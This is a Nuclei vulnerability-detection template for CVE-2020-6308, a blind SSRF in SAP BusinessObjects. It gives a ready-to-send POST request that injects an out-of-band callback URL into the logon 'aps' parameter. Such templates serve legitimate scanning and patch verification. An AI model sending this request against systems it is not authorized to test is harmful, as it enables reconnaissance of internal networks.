id: CVE-2020-6308

info:
  name: SAP BusinessObjects Business Intelligence Platform - Blind Server-Side Request Forgery
  author: madrobot
  severity: medium
  description: |
    SAP BusinessObjects Business Intelligence Platform (Web Services) 410, 420, and 430 is susceptible to blind server-side request forgery. An attacker can inject arbitrary values as CMS parameters to perform lookups on the internal network, which is otherwise not accessible externally. On successful exploitation, attacker can scan network to determine infrastructure and gather information for further attacks like remote file inclusion, retrieving server files, bypassing firewall, and forcing malicious requests.
  remediation: |
    Apply the relevant security patches provided by SAP to mitigate this vulnerability.
  reference:
    - https://github.com/InitRoot/CVE-2020-6308-PoC
    - https://launchpad.support.sap.com/#/notes/2943844
    - https://wiki.scn.sap.com/wiki/pages/viewpage.action?pageId=558632196
    - https://nvd.nist.gov/vuln/detail/CVE-2020-6308
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
    cvss-score: 5.3
    cve-id: CVE-2020-6308
    cwe-id: CWE-918
    epss-score: 0.00306
    epss-percentile: 0.66552
    cpe: cpe:2.3:a:sap:businessobjects_business_intelligence_platform:4.1:-:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: sap
    product: businessobjects_business_intelligence_platform
  tags: cve,cve2020,sap,ssrf,oast,unauth

http:
  - raw:
      - |
        POST /AdminTools/querybuilder/logon?framework= HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        aps={{interactsh-url}}&usr=anything&pwd=anything&aut=secEnterprise&main_page=ie.jsp&new_pass_page=newpwdform.jsp&exit_page=logonform.jsp

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol # Confirms the DNS Interaction
        words:
          - "dns"

      - type: word
        part: location
        words:
          - "{{BaseURL}}/AdminTools/querybuilder/logonform.jsp"
# digest: 4a0a004730450220298e537b53ca388c6fa514c55ac9731d27ae82c5a776907480225b5482440799022100860c710ff228f9b6c580f7e56045ead4d75dd313b847747556eb1c9d9a44da14:922c64590222798bb761d5b6d8e72950